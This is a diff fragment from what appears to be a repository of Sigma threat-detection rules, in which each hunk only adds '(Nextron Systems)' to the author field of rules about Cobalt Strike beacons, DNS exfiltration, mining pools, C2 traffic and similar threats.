    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md
    - https://gist.github.com/Capybara/6228955
-author: Tim Ismilyaev, oscd.community, Florian Roth
+author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
 date: 2020/10/19
 modified: 2021/11/27
 tags:
@@ -7,7 +7,7 @@ status: experimental
 description: Detects usage of "find" binary in a suspicious manner to perform discovery
 references:
    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
    - attack.discovery
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
 references:
    - https://twitter.com/breakersall/status/1533493587828260866
-author: Florian Roth, Matt Kelly (list of domains)
+author: Florian Roth (Nextron Systems), Matt Kelly (list of domains)
 date: 2022/06/07
 tags:
    - attack.initial_access
@@ -5,7 +5,7 @@ description: Detects suspicious DNS queries known from Cobalt Strike beacons
 references:
    - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns
    - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/05/10
 modified: 2022/10/09
 tags:
@@ -4,7 +4,7 @@ status: stable
 description: Detects suspicious DNS queries to Monero mining pools
 references:
    - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/24
 tags:
    - attack.impact
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious DNS queries using base64 encoding
 references:
    - https://github.com/krmaxwell/dns-exfiltration
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/05/10
 modified: 2022/10/09
 tags:
@@ -7,7 +7,7 @@ references:
    - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/
    - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/
    - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/06/05
 modified: 2022/10/09
 tags:
@@ -5,7 +5,7 @@ description: Detects communication to C2 servers mentioned in the operational no
 references:
    - https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
    - https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/04/15
 modified: 2021/11/27
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects a segmentation fault error message caused by a creashing apache worker process
 references:
    - http://www.securityfocus.com/infocus/1633
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/28
 modified: 2021/11/27
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects an issue in apache logs that reports threading related errors
 references:
    - https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/01/22
 modified: 2021/11/27
 logsource:
@@ -2,7 +2,7 @@ title: Multiple Modsecurity Blocks
 id: a06eea10-d932-4aa6-8ba9-186df72c8d23
 status: stable
 description: Detects multiple blocks by the mod_security module (Web Application Firewall)
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/28
 modified: 2023/01/07
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group
 references:
    - https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/02/08
 modified: 2022/10/09
 tags:
@@ -4,7 +4,7 @@ status: experimental
 description: Detects Baby Shark C2 Framework communication patterns
 references:
    - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/06/09
 modified: 2022/08/15
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects HTTP requests used by Chafer malware
 references:
    - https://securelist.com/chafer-used-remexi-malware/89538/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/01/31
 modified: 2022/08/15
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
 references:
    - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/06
 modified: 2022/12/25
 tags:
@@ -4,7 +4,7 @@ status: test
 description: Detects download of certain file types from hosts with dynamic DNS names (selected list)
 references:
    - https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/11/08
 modified: 2021/11/27
 tags:
@@ -10,7 +10,7 @@ references:
    - https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf
    - https://www.spamhaus.org/statistics/tlds/
    - https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/11/07
 modified: 2023/01/09
 tags:
@@ -5,7 +5,7 @@ related:
      type: similar
 status: test
 description: Detects executable downloads from suspicious remote systems
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/13
 modified: 2023/01/09
 tags:
--- a/Show More
+++ b/Show More